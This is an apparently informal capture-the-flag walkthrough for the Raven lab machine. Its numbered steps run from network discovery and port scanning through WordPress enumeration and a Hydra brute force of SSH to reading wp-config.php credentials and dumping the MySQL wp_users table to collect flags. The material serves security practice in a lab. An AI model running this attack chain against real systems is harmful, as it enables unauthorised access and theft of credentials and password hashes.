1:
Find Ip for target Machine by using:
netdiscover -i <interface> -r <Ip>/24
Take the Ip's from the results and put it in a text file called IPs.txt
2:
Port Scan the IP's
nmap -F -iL <directory path>/IPs.txt
use this to find the target machine we will call it <IP> from here out because depending on VM settings the #'s can be different
3:
Nmap will reveal that port 80 is open so naturally
nikto -h http://<IP>/
4:
nikto will show wordpress is installed
5:
Inspect Elements on <IP>/services.html to find flag1
6:
wpscan the <IP>/wordpress/ site
check out the commands folder for the specific command
7:
attack the ssh protocal with the usernames list you found
use Hydra, check the commands folder for the specific command
8:
Now you have micheales creds
ssh michael@<IP>
password: <you should know it from earlier wont be that easy>
9:
Now we are in
cd ./var/www/
ls -l
cat flag2
10: read the wordpress config file for the DB info
michael@Raven:~$ cat /var/www/html/wordpress/wp-config.php
11:
Hopefully we realized by now that if its Wordpress we are attacking which is just controls serving the webpage and directory we realize that theres a DB as well with this info
and what other DB to check for then the infamous Mysql
mysql -u root -p
password: <use the password from teh config file we read in step 10>
12:
Now that you have signed into the mysql server you shoul dhave the mysql> cmd line
A:
mysql> show databases;
B:
mysql> use wordpress;
C:
mysql> show tables;
D:
mysql> select * from wp_users; #gives the hashes for users BUT!!!!#
E!:
mysql> select * from wp_users;
that will give you flag 3 and 4 and thats it all 4 flags found with root access to DB thats mission complete!